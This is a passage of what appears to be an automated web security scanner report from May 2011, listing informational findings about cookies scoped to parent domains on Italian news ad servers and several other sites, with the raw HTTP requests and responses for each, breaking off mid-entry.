GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUE088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUF088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.27. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU1088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:03 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU2088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.28. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930 HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:54 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1NKO10CUN; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 36093
Connection: close
Content-Type: image/gif

GIF89a,................................................................................m.................W...........l..@..........1.............................F..\.......6..w........~z.d..oh......
...[SNIP]...

14.29. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU2088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:25 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU3088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.30. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUM088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:55:10 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUO088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.31. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUL088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:48:54 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUN088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adv.ilsole24ore.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:53 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMID=adc1d6f34dbf3090; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 1552
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write ('<!-- \n');
document.write ('Support: http://adv.ilsole24ore.it#OasDefault/BancaPopMilano_XGR_am_110502#87210#83881.html#d951c#1297330909#91#Hc#Top#www.ilsole24ore.it/07/sole5/shopping
...[SNIP]...

14.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930?http://www.webank.it/lndpage/promo321.html HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/799974/728x90_wetrade_290411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU3088N

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:45:36 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1NKO10CUN|O01CUX; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
Location: http://www.webank.it/lndpage/promo321.html
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 305

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</
...[SNIP]...

14.34. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1
Host: adv.ilsole24ore.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:23:00 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU7188N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
Location: http://www.stile-magazine.it
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P>
<HR>
<A
...[SNIP]...

14.35. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:12 GMT
Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

14.36. http://auth.rossoalice.alice.it/aap/serviceforwarder  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://auth.rossoalice.alice.it
Path:   /aap/serviceforwarder

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aap/serviceforwarder HTTP/1.1
Host: auth.rossoalice.alice.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:23:33 GMT
Server: Apache
Location: http://maileservizi.alice.it/home/login.html
Set-Cookie: slat=1304375040; domain=.alice.it; path=/
Connection: close
Content-Type: text/html
Content-Length: 283

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://maileservizi.alice.it/home/
...[SNIP]...

14.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBofaIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=24ad32c2-af7c-40e0-8d47-2a3f2f9676673HU080; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:13 GMT
Connection: close
Content-Length: 1824

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

14.38. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/tr/17671-124835-21707-7

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com;
Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com;
Content-Type: image/gif
Content-Length: 49
Date: Mon, 02 May 2011 22:16:38 GMT

GIF89a...................!.......,...........T..;

14.39. http://del.icio.us/post  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://del.icio.us
Path:   /post

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:24:02 GMT
Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162

The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P>
<!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->

14.40. http://go.techtarget.com//clicktrack-r/activity/activity.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/activity.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //clicktrack-r/activity/activity.gif?activityTypeId=16&t=2240031635&a=2011-05-02%2021:29:36&c=normal&r=178895&g=212087 HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783; tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; ugcCltHeight=; bn_u=UNASSIGNED

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://media.techtarget.com/searchTechTarget/images/spacer.gif
Set-Cookie: bk=9bc3dd27-5b12-4c7d-86ae-0d19a67e63b7; domain=.techtarget.com; path=/; expires=Sun, 31-Jul-2011 21:29:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 100
Date: Mon, 02 May 2011 21:29:49 GMT

The URL has moved <a href="http://media.techtarget.com/searchTechTarget/images/spacer.gif">here</a>

14.41. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM]
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv
...[SNIP]...

14.42. http://it.yahoo.com/add  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.yahoo.com
Path:   /add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

